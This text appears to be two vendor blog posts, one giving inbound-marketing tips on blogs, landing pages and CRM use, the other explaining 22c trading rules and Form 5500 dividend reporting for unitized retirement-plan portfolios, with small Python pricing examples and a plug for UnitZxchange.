It is amazing how much relevant information businesses have on the shelves.  This information can be found hidden away in their minds or on their bookshelves.  A common mistake is to restrict the blogging to only senior approved staff.  In reality, some of the richest blogs come from experienced staff on the front lines.  A wealth of rich content can be found in prior works or just life experience that does not require a huge effort to publish.  The best blogs are only a few paragraphs, so sometimes an existing work can generate several blog entries over several weeks.  Some examples of existing information which can be recycled:

  • Existing general works can be edited down to one key point.
  • Custom work can be generalized to fit a broader audience.
  • Staff can be tapped for life experience.
  • Speeches can be captured to video.
  • Slide shows can be generalized and shortened.

 

The blog not only establishes your credibility, but it also drives your SEO authority because each blog page is itself viewed as a website.  This means that after providing some unique and valuable nuggets, it is advantageous to always refer the reader back to the core site for additional information.  Of course, the links must carefully use the appropriate tags to describe what will be found within the referenced landing page.  This is a key way to increase the SEO authority of your home domain while at the same time developing a loyal prospect base.

 


Landing Page

Now that we have a prospect interested, where do we send them?  The recommended process is to direct prospects to a specifically designed Landing Page.  A business may have several Landing Pages for different lines of business or target customer groups.  A common mistake is to direct prospects to the home page, which is by necessity a hub – one size fits none.  Chances are your business offers several products, but this prospect came only because of an interest in one!  Don’t put all of your toys on the table and ask them to pick.  By contrast, the Landing Page has a specific focus and a call to action.  It shows clearly what the business is offering this prospect and what you are asking the prospect to do – Subscribe to our newsletter!  At this point, it is a best practice to offer some free service with a minimal obligation.  Some examples:

  • Newsletter
  • Resume review or preparation
  • Job search questionnaire
  • Interview quiz
  • White papers

 

The most successful teasers do not necessarily require any upfront registration or credit cards.  These barriers will dramatically increase the bounce rate before the prospect has even tried your service.  It seldom works on the street to ask someone for their SSN before at least getting some agreement on the weather and the latest sports game.  Remember, your competition is only one click away.  The better approach is to ask for the registration after the prospect has consumed the free item.  Then, you not only have their information, but you also have a more committed prospect.  They agreed to register after they digested your information; this avoids wasting a lot of time following up with cold leads.

CRM

After a business has pulled in new prospects with high search engine listings and kept their interest in social media, the business must convert these prospects into customers.  This process must use a light touch and be easy to use.  It must allow the customer to have control over their account and be comfortable that they can unsubscribe at any time.

This tool enables the business to communicate directly with subscribers, with content tailored to their situation or needs.  The information can be delivered with tailored screens, tailored newsletters, and/or advertising.  General messages are rapidly becoming as ineffective as billboards.  Registered prospects expect you to know them and to give them the respect they deserve by only giving them what they need to know.  It is unproductive to explain how to fill out a resume at McDonalds when your customer only wants CIO positions.

This database will become your business’s most important resource.  It will be used as an initial pool for seminars and book sales.  The CRM system can’t be something you leave on the sideline.  It must be integrated into your web engine and overall plan.  The settings must understand privacy preferences and security restrictions.  The best practices leverage the CRM for:

  • Self-managed personal accounts for automatic follow-up and repeat-customer tracking
  • Tracking multiple addresses, including security and status designations
  • Attaching customers to business-oriented groups with lifecycle status history tracking
  • Sending targeted email messages or publishing online directories (by group)
  • Exporting lists for mailings or performing mass email messaging
  • Leveraging relationships between customers and businesses or between family customers
  • Tracking and leveraging the status history of each customer by product or opportunity

Now, you are online and ready to go with your e-business.  But check out the inbound-marketing-ready web framework.

How to Unitize and keep Uncle Sam happy



1) Do the 22c regulations apply to rebalancing activities?

As you probably know, these 22c rules are intended to identify and stop too frequent participant trading.  These rules focus on investment movements directed by the participants.

Throughout the year, mutual funds will send electronic requests for clarification on trades to plan administrators. These are usually in response to unusual amounts or suspicious timing.  The plan has an obligation to respond within a short time window.  All can be done electronically, if the right systems are in place – but the system must make the right response based upon the information it knows.

The advantage with portfolios is that most of the trades are the result of investment manager instructions for rebalancing.  The contribution splits are done by the prescribed ratios.  The withdrawals are done by the prescribed formulas.  And any transfers internal to the portfolio for rebalancing, whether on a daily basis or another frequency, are done under the adviser’s standing instructions.  These actions are not being taken by the participant – but by the plan.

The only remaining participant activity is entering and exiting the portfolio.  This process must be managed by the recordkeeping system to ensure that it is adequately controlled to limit market timing.  However, the fact that the portfolio is made up of several investments makes it difficult if not impossible to take advantage of market blips.

There is some confusion here because of the workarounds many shops had to use to accommodate portfolios, given the limitations of recordkeeping systems.  A common workaround placed each underlying investment at the participant level and then used allocation ‘packages’ to manipulate the investments.  Thus, the contribution, withdrawal, and rebalancing activities generate participant-level history and activity.  This not only creates unnecessary overhead on the recordkeeping system, but it actually creates a false view of 22c activities.  It makes it difficult to determine what is at the participant’s direction and what is really at the plan’s (advisor’s) direction.  Unfortunately, all of it falsely appears to be participant activity.

Based upon our review with a reputable legal firm familiar with 22c, we believe that all the investment activities for the underlying investments come under the watchful eye of 22c.  However, we believe most investment houses will relax the scrutiny if the recordkeeper explains that the funds are used in a plan managed portfolio.  This means that the answer to most every query will be that there are no participants involved and it is a result of plan actions.  This is particularly compelling if the plan can show adequate controls limiting participants in and out of the portfolio as a whole.  However, this approach is cleaner if the underlying investment is solely used by the portfolio; if the same asset is still required by the plan for individual investment, a subaccount may be a good strategy.

 

 

2) How do the portfolio dividends get reported on the 5500?

Where the underlying investments are held on the recordkeeping system, the administrator must also manage and track the dividends for EACH investment.  This is a complex and expensive process, particularly if it is done at the participant level.  However, it makes the dividend information available for the standard 5500 interfaces from the recordkeeping system.

In other cases, the investment dividends are not reportable because of the asset wrapper.  In the case of a collective trust or a mutual fund, the underlying dividends are not reportable because they are wrapped into the asset as a whole.  Of course, these assets have their own regulations and reporting requirements – which also often mean additional cost.  Unfortunately, this exception does not apply to a unitized portfolio.

In the case of a unitized portfolio, the dividends are baked into the price each day.  They are accrued to provide as accurate and level a valuation as possible; in fact, there is no more equitable or efficient way to do it.  The expected dividends are tracked and reconciled against the actual dividends posted.  But the only investment earnings type the plan sees is appreciation (or depreciation).
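
A minimal sketch of the daily pricing arithmetic, with hypothetical figures:

    def unit_price(market_value, accrued_dividends, units_outstanding):
        """Dividends are 'baked in': they raise the unit price the day they
        accrue, so the plan only ever sees appreciation or depreciation."""
        return (market_value + accrued_dividends) / units_outstanding

    units = 10_000.0
    print(unit_price(1_000_000.0, 0.0, units))      # 100.0 before the accrual
    print(unit_price(1_000_000.0, 5_000.0, units))  # 100.5 after a $5,000 accrual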

Yes, the recordkeeping system is only aware of the price.  This is a substantial advantage in providing accurate and simple participant accounting throughout the year.  It avoids pushing dividend accounting down to the participant level, which makes all activities easier and cleaner, particularly reversals.  All of the dividend accounting is done at a global level, so the recordkeeping system is not aware of dividend information to pass on to the 5500.

Based upon our review with a reputable legal firm familiar with 5500 reporting, we understand investment dividends for the underlying investments within a portfolio must be reported through to the 5500.  No problem: the recordkeeping system will simply provide the interface to the 5500 tool as is.  Then, the UnitZxchange tool will provide a plan-level report showing the summary of dividends for the year.  The dividend amount is then put into the proper line on the 5500 and the appreciation is adjusted accordingly.  In order to automate this process, UnitZxchange can provide an interface to update a user-defined field in the recordkeeping system, and this can be mapped into the 5500 interface.  This means you have the comfort of knowing the required information is closely tracked and readily available.  And the advantages of managing the dividends at the global level far outweigh the annual adjustment of one figure on the 5500 (which can also be automated).
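
As a back-of-the-envelope illustration of that one-figure adjustment (the amounts are made up; only the arithmetic is the point):

    # The recordkeeper reports everything as appreciation; the plan-level
    # dividend summary moves dividends to their own 5500 line and adjusts
    # appreciation accordingly.
    reported_appreciation = 80_000.00   # hypothetical recordkeeper figure
    dividends_for_year    = 12_000.00   # hypothetical plan-level summary

    form_5500_dividends    = dividends_for_year
    form_5500_appreciation = reported_appreciation - dividends_for_year
    print(form_5500_dividends, form_5500_appreciation)   # 12000.0 68000.0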

Check out www.UnitZxchange.com for more details.